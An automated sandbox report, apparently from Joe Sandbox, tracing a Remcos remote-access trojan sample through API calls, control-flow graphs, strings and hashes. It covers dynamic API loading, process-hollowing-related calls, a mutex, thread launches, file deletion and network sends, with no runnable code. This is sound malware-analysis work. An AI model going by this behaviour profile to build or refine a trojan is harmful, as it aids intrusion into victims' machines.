                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                              • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                              • API String ID: 4236061018-3687161714
                                                              • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                              • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                              • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                              • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                              Control-flow Graph

                                                              control_flow_graph 465 443355-443361 call 448d49 468 443383-44338f call 4433da ExitProcess 465->468 469 443363-443371 GetPEB 465->469 469->468 470 443373-44337d GetCurrentProcess TerminateProcess 469->470 470->468
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                                              • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                                              • ExitProcess.KERNEL32 ref: 0044338F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID: PkGNG
                                                              • API String ID: 1703294689-263838557
                                                              • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                              • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                              • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                              • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88

                                                              Control-flow Graph

                                                              control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 85 40ec43-40ec45 80->85 88 40ec47-40ec49 85->88 89 40ec4e-40ec55 85->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74-40ec7b call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 120 40ec87-40ec9a call 401e65 call 401fab 109->120 121 40ec7d-40ec82 call 407773 call 40729b 109->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40ed74 call 401e65 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 213 40ed79-40edb6 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 203->213 217 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 211->217 212->217 213->178 217->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 217->288 286 40f017-40f019 234->286 287 40effc 234->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f322 call 401fab call 41353a 413->416 415->418 416->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 416->427 418->416 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                              APIs
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000104), ref: 0040EA29
                                                                • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                              • API String ID: 2830904901-1043497488
                                                              • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                              • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                              • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                              • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                              • SetEvent.KERNEL32(?), ref: 00404E43
                                                              • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                              • closesocket.WS2_32(?), ref: 00404E5A
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                              • SetEvent.KERNEL32(?), ref: 00404EA2
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                              • SetEvent.KERNEL32(?), ref: 00404EBA
                                                              • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                              • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                              • SetEvent.KERNEL32(?), ref: 00404ED1
                                                              • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                              • String ID: PkGNG
                                                              • API String ID: 3658366068-263838557
                                                              • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                              • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                              • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                              • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                              Control-flow Graph

                                                              control_flow_graph 473 4485e6-4485fa 474 448607-448622 LoadLibraryExW 473->474 475 4485fc-448605 473->475 477 448624-44862d GetLastError 474->477 478 44864b-448651 474->478 476 44865e-448660 475->476 481 44863c 477->481 482 44862f-44863a LoadLibraryExW 477->482 479 448653-448654 FreeLibrary 478->479 480 44865a 478->480 479->480 483 44865c-44865d 480->483 484 44863e-448640 481->484 482->484 483->476 484->478 485 448642-448649 484->485 485->483
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                              • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                              • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                              • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                              • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

                                                              Control-flow Graph

                                                              control_flow_graph 486 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                              APIs
                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                              • GetLastError.KERNEL32 ref: 0040D0BE
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastMutex
                                                              • String ID: SG
                                                              • API String ID: 1925916568-3189917014
                                                              • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                              • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                              • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                              • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519

                                                              Control-flow Graph

                                                              control_flow_graph 489 44854a-448574 490 448576-448578 489->490 491 4485df 489->491 492 44857e-448584 490->492 493 44857a-44857c 490->493 494 4485e1-4485e5 491->494 495 448586-448588 call 4485e6 492->495 496 4485a0 492->496 493->494 501 44858d-448590 495->501 497 4485a2-4485a4 496->497 499 4485a6-4485b4 GetProcAddress 497->499 500 4485cf-4485dd 497->500 502 4485b6-4485bf call 434591 499->502 503 4485c9 499->503 500->491 504 4485c1-4485c7 501->504 505 448592-448598 501->505 502->493 503->500 504->497 505->495 506 44859a 505->506 506->496
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                              • String ID:
                                                              • API String ID: 2279764990-0
                                                              • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                              • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                              • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                              • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9

                                                              Control-flow Graph

                                                              control_flow_graph 509 40165e-401664 510 401666-401668 509->510 511 401669-401674 509->511 512 401676 511->512 513 40167b-401685 511->513 512->513 514 401687-40168d 513->514 515 4016a8-4016a9 call 43455e 513->515 514->515 516 40168f-401694 514->516 519 4016ae-4016af 515->519 516->512 518 401696-4016a6 call 43455e 516->518 521 4016b1-4016b3 518->521 519->521
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                              • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                              • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                              • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D

                                                              Control-flow Graph

                                                              control_flow_graph 537 4461b8-4461c4 538 4461f6-446201 call 44062d 537->538 539 4461c6-4461c8 537->539 546 446203-446205 538->546 541 4461e1-4461f2 RtlAllocateHeap 539->541 542 4461ca-4461cb 539->542 543 4461f4 541->543 544 4461cd-4461d4 call 4455c6 541->544 542->541 543->546 544->538 549 4461d6-4461df call 443001 544->549 549->538 549->541
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                              • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                              • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                              • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                                • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                                • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                              • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                              • Sleep.KERNEL32(000007D0), ref: 00408733
                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
